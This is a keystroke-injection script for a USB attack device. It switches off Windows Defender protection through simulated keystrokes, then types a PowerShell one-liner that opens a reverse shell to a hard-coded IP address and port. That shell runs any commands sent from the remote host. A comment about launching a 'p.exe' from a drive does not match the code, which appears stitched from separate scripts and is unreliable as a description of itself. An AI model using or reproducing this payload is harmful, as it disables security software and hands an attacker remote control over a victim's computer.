REM Disable windows defender
DELAY 2000
GUI
DELAY 100
STRING Windows Defender Settings
ENTER
DELAY 4000
REM Navigate to "Manage" button
ENTER
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 2000
REM Press the "Manage" button
ENTER
DELAY 1000
SPACE
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 1000
TAB
SPACE
DELAY 1000
TAB
SPACE
DELAY 1000
TAB
TAB
SPACE
DELAY 500
REM close the window
DELAY 500
ALT F4
REM made by !DED#0026
REM put the exe that you wanna execute on a drive drive of your choice and name it p.exe or change the name in line 9(don't recommend because one letter is faster to type)
REM despite this being a huge script, trust me it runs fast.
GUI R
DELAY 100
STRING cmd /T:02
ENTER
DELAY 100
STRING powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('3.68.219.227',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


ENTER 
